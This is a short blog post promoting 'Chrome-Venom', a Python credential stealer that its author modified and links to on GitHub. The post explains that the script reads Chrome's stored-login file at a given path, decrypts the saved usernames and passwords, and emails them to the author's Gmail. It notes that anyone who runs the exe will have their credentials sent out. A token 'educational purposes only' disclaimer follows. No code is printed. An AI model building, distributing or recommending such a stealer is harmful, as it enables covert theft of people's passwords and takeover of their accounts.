Remote Chrome Password Stealer

These days I found a very beautifull python script that just prints the google chrome usernames and passwords that are stored on your machine.

In simple terms the script is self explanatory and goes to:

-"%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data"
where the passwords and usernames are stored
-decrypt them
-and prints the list of usernames and passwords

My Remote Function

Of course I couldn't resist to modify this script and to add a function that takes the list, stores It to a txt file and send It via gmail wherever I want to.

So If anyone on any machine clicks this script(exe) then all his google chrome credentials will be sent to a gmail account.

My Script

My script (Chrome-Venom) is on my github account https://github.com/Ierofantis/Chrome_Venom and read carefully the README.md file...

End

This script is for educational purposes only and If anyone takes It for Illegal actions I am not taking any responsibility.

Ierofantis
Share on Google Plus

About Twelve Monks

    Blogger Comment
    Facebook Comment

0 σχόλια:

Δημοσίευση σχολίου